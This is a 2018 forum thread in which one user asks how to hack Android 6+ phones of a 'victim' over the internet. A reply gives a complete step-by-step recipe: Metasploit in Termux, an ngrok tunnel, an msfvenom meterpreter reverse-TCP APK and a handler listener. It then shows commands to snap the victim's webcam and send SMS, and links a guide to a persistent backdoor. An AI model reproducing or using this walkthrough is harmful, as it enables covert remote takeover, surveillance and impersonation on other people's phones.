Benny639 Posted October 1, 2018

Hi there! I was hacking Android 5 and 4 with Evil-Droid and sometimes with Metasploit, but now for hacking Android 6 and higher... I can't manage to get a strong Meterpreter session from the victim. The Meterpreter session opens and closes immediately (possibly due to Android 6 and higher having more security)... Please guide me on how I can hack Android 6 and higher smoothly... If you have any other good way to hack Android over WAN, then please let me know. Thank you!
acid klown Posted October 14, 2018

Hi Benny! ^_^ Nice to meet you. I am a big Hak5 fan, myself. Shout out to Kitchen and the team! I am interested in the same topic, and spent a lot of time this week making it all real. Here is a summary of what I did to pwn my Android phone via my other Android phone:

1) Download Termux on the Google Play store.
2) pkg install wget, pkg install curl, pkg install python, pkg install git, pkg install ssh
3) git clone https://github.com/rapid7/metasploit-framework
4) CD metasploit-framework
5) bundle install (takes about 5 minutes)
6) Go to https://dashboard.ngrok.com/user/signup and register for free port forwarding.
7) git clone https://github.com/inconshreveable/ngrok
8) CD ngrok
9) ./ngrok tokenauth (your ngrok token), one-time dealio
10) ping o.tcp.ngrok.io (get the ngrok IP address)
11) ./ngrok tcp 4564
12) Open a new window session: slide thumb to the right. Offers a Termux new session. In the new session, CD metasploit framework.
13) ./msfvenom -p android/meterpreter/reverse_tcp LHOST= (STEP 11) LPORT=(Step 10, ngrok random port) R> /sdcard/lolz.apk
    This creates the payload in the root directory on the Android phone.
14) ./msfconsole
15) msf> use exploit/multi/handler
    msf> set payload android/meterpreter/reverse_tcp
    msf> set LHOST localhost
    msf> set lport 4564
    msf> exploit -j -z
16) Run the lolz.apk payload on the other phone. Ngrok waiting for session. Mad waiting for session. Voila!

Once it connects, type sessions -i 1 and see Meterpreter. Type help for commands. Type command -h for help with a command.
webcam_snap -i 2 -p /sdcard/selfy.jpg
send_sms -d 2149711234 -t "what's up Darren :)"
Commands here: https://gist.github.com/mataprasad/c5dd39154a852cdc67ff7958e0a82699

You can make the connection persistent only as long as they are not rebooted. To make a persistent shell, see this article: https://null-byte.wonderhowto.com/how-to/create-persistent-back-door-android-using-kali-linux-0161280/ Man, you're good to pwn.

I also recommend: git clone https:///github.com/RajkumrdusadTool-X, 200 Kali tools for Termux!! I love this prog. Please note: the ngrok port randomly changes, so your payload must co-align. I haven't used Evil-Droid so maybe you know. ? - คςเ๔ кɭ๏ฬภ
icarus255 Posted October 21, 2018 (edited)

There are plenty of YouTube videos on how to do this. The above post summarises the process pretty well too. Technically speaking, you don't need ngrok to handle connections over WAN. You just need to add port forwarding rules on your router to direct traffic to your local listener/server address. As for your closing connections, that could be for any number of reasons including: firewall rules blocking incoming/outgoing traffic on certain ports, misconfigured payloads, etc. I don't use Android phones anymore so I haven't tested this on any new phones to confirm if new security policies are the issue.

Edited October 22, 2018 by icarus255: Inappropriate suggestion
acid klown Posted October 22, 2018

I already requested my response to be withdrawn. I don't support terrorism.
Forkish Posted October 26, 2018

On 10/14/2018 at 5:03 AM, acid klown said: [...]

A+